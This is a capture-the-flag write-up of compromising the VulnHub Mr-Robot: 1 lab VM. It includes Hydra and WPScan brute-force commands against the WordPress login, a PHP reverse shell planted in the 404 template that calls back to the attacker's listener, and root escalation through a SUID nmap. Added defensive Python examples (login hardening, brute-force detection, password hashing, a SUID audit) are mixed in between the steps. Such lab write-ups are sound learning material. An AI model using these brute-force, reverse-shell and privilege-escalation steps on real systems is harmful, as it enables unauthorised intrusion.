Hello world! Today I'll be detailing the steps I took to hack VulnHub's Mr-Robot: 1 VM, created by Leon Johnson. The VM has three keys hidden in different locations and my goal is to find all three.
Configuration
I'll be using a Kali Linux VM to attack Mr-Robot: 1, which we will refer to as "target" throughout the write-up. Both machines are set up on Oracle VM VirtualBox and their networks are set to the Host Only Network.
Let's start hacking!
Where is Key 1?
First we will need to do a little reconnaissance, so let's start with figuring out our target's IP address.
To do that, we'll check the Kali machine's address using the command ip address.
With our IP, 192.168.56.104, we can scan the full range of the subnet for our target's address with the following command:
nmap -oX nmap_scan.xml 192.168.56.0/24
After a quick check of each IP on the nmap report, we see our target is on 192.168.56.103:
Enumeration
There are tools like dirb that we can use to discover subdirectories of the main host address, but that method is exhaustive and can take some time. To be efficient with our time, let's manually check some common paths and see if we can get a lead:
Possibly there are instructions on 192.168.56.103/readme...
...rude that it's not willing to help us with the hack.
How about 192.168.56.103/license...
...ummm, language.
Could see if it's a WordPress (WP) site with 192.168.56.103/wp-login...
...looks like we got ourselves a WP site. Let's try the default admin & password combination and see if we can get in.
...hmmm, doesn't look like we can get in. Noting the error message, it's prompted because of an invalid username. So if we enter the correct username, would it prompt us with “Invalid password” instead? 👀
We'll circle back to the WP login later...
What about 192.168.56.103/robots.txt, which is the file that tells search engine crawlers what to index...
...and luckily enough, there's key-1-of-3.txt, our 1st key! ✅
Where is Key 2?
As we saw earlier, there is a WP site we can try logging into, but of course we can't log in without the right username & password.
Using WPScan, we can try to find any valid users:
wpscan --url http://192.168.56.103/wp-login.php --enumerate u
...but from the looks of it, nothing substantial, except maybe the WordPress version, which seems exploitable.
There was that fsocity.dic file we found earlier, maybe there's a lead there? A quick cat shows it seems to be a long list of "random" words...
...that we can use for possible username and password combinations!
Brute forcing username & password
There are a few tools that we can use to brute force the WP login:
Now remember that word list fsocity.dic? Yeah, that one file has 858,160 words...
...and if we use fsocity.dic as the wordlist for the cracking tool, it's going to take a long while to brute force 858,160 potential username/password combos.
If we remove any duplicates and sort the wordlist, we can reduce the time it takes to brute force (TL;DR: shorter list, faster to crack):
cat fsocity.dic | sort | uniq > sorted_uniq_fsocity.dic
With that one command, we were able to reduce the word count to 11,452. Now to get crackin'!
Burp Suite
Using Burp Suite, we can configure the attack to use fsocity.dic as the word list parameter to brute force the username.
Looking at the length of each response, most are pretty consistent when erroring out, but scrolling not too far down to Elliot, we see the response length is 4164 instead of the usual 4114. In the Rendered response, we see that the error message now says the password entered for Elliot is incorrect, which, given our earlier observation about the error messages, lets us conclude that Elliot is a valid user.
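The two error messages we just used (invalid username vs. incorrect password for a named user) are the classic username enumeration oracle. The Python below is an added example, not code from the original post or from WordPress: a tiny login handler that leaks the way the VM's form does, beside a hardened one that returns a single fixed message, and a check that tells the two apart. The user store and the password are constructed for the demo.

```python
import hashlib
import hmac

# Constructed user store for the demo (username -> SHA-256 of password).
# Not the VM's data; a real app would use a salted, iterated password hash.
USERS = {
    "alice": hashlib.sha256(b"correct horse battery").hexdigest(),
}
# Hash of an empty string, so unknown users still cost one comparison.
_DUMMY_HASH = hashlib.sha256(b"").hexdigest()


def _password_matches(username: str, password: str) -> bool:
    """Constant-time comparison that also runs for unknown usernames."""
    stored = USERS.get(username, _DUMMY_HASH)
    supplied = hashlib.sha256(password.encode()).hexdigest()
    return hmac.compare_digest(stored, supplied) and username in USERS


def login_verbose(username: str, password: str) -> dict:
    """Leaky handler: the failure message reveals which credential was wrong
    (the behaviour observed on the VM's WordPress login form)."""
    if username not in USERS:
        return {"ok": False, "error": "Invalid username"}
    if not _password_matches(username, password):
        return {"ok": False,
                "error": f"The password you entered for the username {username} is incorrect."}
    return {"ok": True, "error": ""}


def login_uniform(username: str, password: str) -> dict:
    """Hardened handler: one fixed message, identical length, for every failure."""
    if _password_matches(username, password):
        return {"ok": True, "error": ""}
    return {"ok": False, "error": "Invalid username or password."}


def leaks_usernames(handler, known_user: str, unknown_user: str,
                    wrong_password: str = "x") -> bool:
    """True if a wrong password for a real user and a non-existent user
    produce different responses, i.e. the form can be used to enumerate users."""
    real = handler(known_user, wrong_password)
    fake = handler(unknown_user, wrong_password)
    return real != fake or len(real["error"]) != len(fake["error"])


if __name__ == "__main__":
    for name, handler in (("verbose", login_verbose), ("uniform", login_uniform)):
        print(f"{name:8s} leaks usernames: {leaks_usernames(handler, 'alice', 'mallory')}")
```

The length check in leaks_usernames matters as much as the message text: the Burp observation above worked purely on response size (4164 vs 4114), so a hardened form has to keep the failure page byte-for-byte identical, not just reword it.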
Using the sorted list would ideally shorten the brute force time. However, because the list is sorted, it could also take longer to reach the target response, especially if the right credential is near the end of the wordlist.
Considering how long it might take to use Burp Suite to brute force the password (since this is a Community version of Burp), we’ll move on with another tool, Hydra.
Hydra
Using Hydra, we're able to brute force a valid username using the original fsocity.dic and an arbitrary password, test:
hydra -V -L ./fsocity.dic -p test 192.168.56.103 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.56.103%2Fwp-admin%2F&testcookie=1:Invalid username"
Again, it was fairly quick since the username Elliot was right near the top. But if we had used the sorted, unique version of fsocity.dic, it would have taken up to attempt 5,488 of 11,452 to get the username:
Now that we have the username, we can brute force the password for elliot, and here we'll use our duplicate-removed and sorted version of the wordlist, sorted_uniq_fsocity.dic:
hydra -V -l elliot -P ./sorted_uniq_fsocity.dic 192.168.56.103 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.56.103%2Fwp-admin%2F&testcookie=1:incorrect"
WPScan
Note, with WPScan, since we were unable to enumerate any valid users with our preliminary scan, we'll have to rely on the previously mentioned tools (Burp & Hydra) to find the username first.
Once found, we can then use WPScan as an alternative to brute force the password like so:
wpscan -t 10000 -U Elliot -P fsocity.dic --url http://192.168.56.103/
So of the three tools, Hydra was the most suitable, with its quick execution time on this particular machine config. If circumstances were different, say users could be enumerated or we were using the full Burp Suite version, the other tools might have been better for the job.
username: Elliot
password: ER28-0652
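Both Hydra runs above hammer wp-login.php with thousands of POSTs from one address in a short time, which is exactly what a web server log shows on the other side. As an added example (not from the original post), here is a small Python detector that reads Apache-style access log lines, counts POSTs to wp-login.php per source IP in a sliding window, and notes whether a 302 (WordPress's redirect on a successful login) followed the burst. The log lines are constructed for the demo, reusing the Kali IP from this write-up and the 4114/4164 response sizes from the Burp section; 192.168.56.50 is a made-up legitimate user.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed Apache combined-format lines (not captured from the VM).
LOG_LINES = """\
192.168.56.104 - - [10/Feb/2024:14:00:01 +0000] "POST /wp-login.php HTTP/1.1" 200 4114 "-" "Mozilla/5.0"
192.168.56.104 - - [10/Feb/2024:14:00:02 +0000] "POST /wp-login.php HTTP/1.1" 200 4114 "-" "Mozilla/5.0"
192.168.56.104 - - [10/Feb/2024:14:00:03 +0000] "POST /wp-login.php HTTP/1.1" 200 4114 "-" "Mozilla/5.0"
192.168.56.50 - - [10/Feb/2024:14:00:03 +0000] "GET /wp-login.php HTTP/1.1" 200 4098 "-" "Mozilla/5.0"
192.168.56.104 - - [10/Feb/2024:14:00:04 +0000] "POST /wp-login.php HTTP/1.1" 200 4114 "-" "Mozilla/5.0"
192.168.56.104 - - [10/Feb/2024:14:00:05 +0000] "POST /wp-login.php HTTP/1.1" 200 4164 "-" "Mozilla/5.0"
192.168.56.50 - - [10/Feb/2024:14:00:20 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.56.104 - - [10/Feb/2024:14:03:40 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)


def parse_access_log(lines):
    """Yield one dict per parseable line; silently skip lines that do not match."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        yield {
            "ip": m["ip"],
            "time": datetime.strptime(m["time"], "%d/%b/%Y:%H:%M:%S %z"),
            "method": m["method"],
            "path": m["path"],
            "status": int(m["status"]),
        }


def detect_login_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Flag source IPs that POST to wp-login.php `threshold` or more times
    within `window`, and record whether a redirect (login success) followed."""
    recent = defaultdict(deque)   # ip -> timestamps of POSTs inside the window
    totals = defaultdict(int)     # ip -> all wp-login.php POSTs seen
    flagged = {}
    for e in parse_access_log(lines):
        if e["method"] != "POST" or not e["path"].startswith("/wp-login.php"):
            continue
        ip, ts = e["ip"], e["time"]
        totals[ip] += 1
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:          # drop timestamps outside the window
            q.popleft()
        if ip in flagged:
            flagged[ip]["last_seen"] = ts
            if e["status"] == 302:
                flagged[ip]["success_after_burst"] = True
        elif len(q) >= threshold:
            flagged[ip] = {"first_seen": q[0], "last_seen": ts,
                           "success_after_burst": False}
    for ip, rec in flagged.items():
        rec["attempts"] = totals[ip]
    return flagged


if __name__ == "__main__":
    for ip, rec in detect_login_bruteforce(LOG_LINES.splitlines()).items():
        print(ip, rec["attempts"], "attempts; success after burst:",
              rec["success_after_burst"])
```

The success_after_burst flag is the part worth alerting on: a burst alone is noise from a misconfigured client, but a burst followed by a redirect is the pattern this write-up produced when the password brute force landed.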
Now that we have our valid credentials, let's login to the WP site!
Running reverse shell on target
Our next move is to see if we can run the reverse shell from pentestmonkey by inserting it into the 404.php file of the WP site.
We will need to switch the network back to Bridged Adapter in order to download the reverse shell, and then switch back to Host Only Adapter to reconnect with the target.
To download the reverse shell onto Kali machine:
wget "http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz"
Extract it, then open the php-reverse-shell.php file using vim and replace the $ip value with your attacking machine's IP, 192.168.56.104, and change the port to a “cool” number: 4242.
Copy the php-reverse-shell.php code and paste it into Appearance > Editor > 404 Template, then update the file.
Using NetCat, we set up a listener on port 4242 with the command: nc -lnvp 4242
Open new terminal:
curl -X POST http://192.168.56.103/404.php
# This will send a POST request to the 404.php page
You can also trigger it from a web browser by visiting http://192.168.56.103/flaskdjhflakjsdhf. This will return the 404 page, and therefore the request will trigger the reverse shell.
Bam, we have our reverse shell!
Now we want interactive control over the target, so let's spawn /bin/bash in a PTY:
python -c "import pty; pty.spawn('/bin/bash')"
Enumeration
Now that we have our "shell in a shell", let's literally "find" the 2nd key, assuming it has the same file name format as the 1st one:
find / -name "key-2-of-3.txt"
Looks like we got a hit on the key: /home/robot/key-2-of-3.txt
We navigate to our target directory /home/robot. Once there, we do an ls -l and confirm the 2nd key. Then we try to cat it to double check, but it looks like our current privileges don't allow us to access that file.
It looks like it can only be accessed by the robot user, but we don't have a password. We do have a password.raw-md5 file that appears to be readable at our current access level.
If we cat it, it looks like an md5 hash, which was obviously not hinted at by the file name raw-md5 👀.
So let's see if we can crack it by sending it to our good friend CrackStation.
Considering the context clues of the password.raw-md5 file and its contents, we've just found the password for the robot user.
Note that if we weren't already running a PTY terminal, we'd need to run python -c "import pty; pty.spawn('/bin/bash')" in order to execute the su robot command:
So after a quick su robot and authenticating with our cracked credentials, we are able to cat the key-2-of-3.txt file and obtain the 2nd key! ✅
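The reason the password.raw-md5 file fell to CrackStation in seconds is that an unsalted MD5 of a password is the same for everyone who picks that password, so one precomputed table answers every lookup. As an added example (not from the original post), the Python below shows that weak format next to a salted, iterated PBKDF2 store-and-verify pair; the password and salt values are constructed for the demo.

```python
import hashlib
import hmac
import os


def md5_hex(password: str) -> str:
    """Unsalted MD5, the format of the VM's password.raw-md5 file."""
    return hashlib.md5(password.encode()).hexdigest()


def make_pbkdf2(password: str, salt=None, iterations: int = 200_000) -> str:
    """Salted, iterated hash, stored as pbkdf2_sha256$<iterations>$<salt hex>$<dk hex>."""
    salt = os.urandom(16) if salt is None else salt   # fresh random salt per user
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_pbkdf2(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


def same_password_same_hash(password: str, hasher) -> bool:
    """Does hashing one password twice (two users, same password) give identical
    output? True means a single precomputed table cracks every such account."""
    return hasher(password) == hasher(password)


if __name__ == "__main__":
    # Constructed demo password; not the VM's.
    print("md5 repeats:   ", same_password_same_hash("hunter2", md5_hex))
    print("pbkdf2 repeats:", same_password_same_hash("hunter2", make_pbkdf2))
    record = make_pbkdf2("hunter2")
    print("verify ok:     ", verify_pbkdf2("hunter2", record))
```

The iteration count is what slows a wordlist attack down per guess, and the salt is what prevents the precomputed-table shortcut; a file like password.raw-md5 has neither, which is why a lookup service, not a cracking rig, was enough here.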
Where is Key 3?
Thinking of next steps, logically it would make sense to escalate privileges, either up to root or across to other users who have access to files we don't (as we did when we escalated to robot from daemon@linux in the shell). We'll need to find any files with the SUID permission set that we can exploit.
We can run the following to do just that:
find / -perm /4000 -type f 2>/tmp/2
Hmmm, looking at the files with SUID set... passwd seems like a potential lead…
Interesting, why would WP have an nmap directory? 👀
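An nmap with the SUID bit set is exactly the kind of thing a host audit should flag before anyone gets a shell. As an added example (not from the original post), here is a Python scan that does what the find command above does, checking setgid as well as setuid, and then diffs the hits against an allowlist of setuid binaries a stock install is expected to carry. The allowlist is illustrative (constructed for the demo; build yours from a clean image of the same release), and the demo tree it scans is a temporary directory created by the script.

```python
import os
import stat
import tempfile

# Constructed allowlist of setuid binaries a stock install is expected to have.
EXPECTED_SETUID = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/newgrp", "/usr/bin/gpasswd", "/usr/bin/mount",
    "/usr/bin/umount",
}


def find_setuid_files(root):
    """Return regular files under `root` with the setuid or setgid bit set
    (find / -perm /4000 only looks at setuid; this checks both bits)."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append(path)
    return sorted(hits)


def unexpected_setuid(hits, root, expected=EXPECTED_SETUID):
    """Hits (as paths relative to `root`, with a leading slash) not on the allowlist."""
    rel = ("/" + os.path.relpath(p, root) for p in hits)
    return sorted(p for p in rel if p not in expected)


def build_demo_tree():
    """Constructed mini filesystem: an expected setuid passwd, an unexpected
    setuid nmap (what the write-up found on the VM), and a normal ls."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    for rel, mode in (("usr/bin/passwd", 0o4755),
                      ("usr/local/bin/nmap", 0o4755),
                      ("usr/bin/ls", 0o755)):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(b"#!/bin/sh\n")
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    demo_root = build_demo_tree()
    found = find_setuid_files(demo_root)
    print("setuid/setgid files:", found)
    print("unexpected:", unexpected_setuid(found, demo_root))
```

Run it against a real host with find_setuid_files("/") and unexpected_setuid(hits, "/"); the allowlist then needs to be the list from your own golden image rather than the demo set.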
Exploit/escalate permissions to root
On GTFOBins it looks like nmap is a Unix binary we can exploit to escalate our privileges. As detailed on the repo, we'll need to run the following commands to spawn an interactive system shell:
nmap --interactive
!sh
Run whoami to confirm root privileges.
Navigate to /root, do a quick ls, and there is key-3-of-3.txt, our final key! ✅
Conclusion
Overall, this was a fun challenge for my first exercise in cybersecurity. I was focused on exploring different approaches to find each key, so I can be more aware of my toolkit and future methodology. It was definitely not quick to finish the CTF, but I learned a lot in doing so.
Until the next time, happy hacking! ✌🏻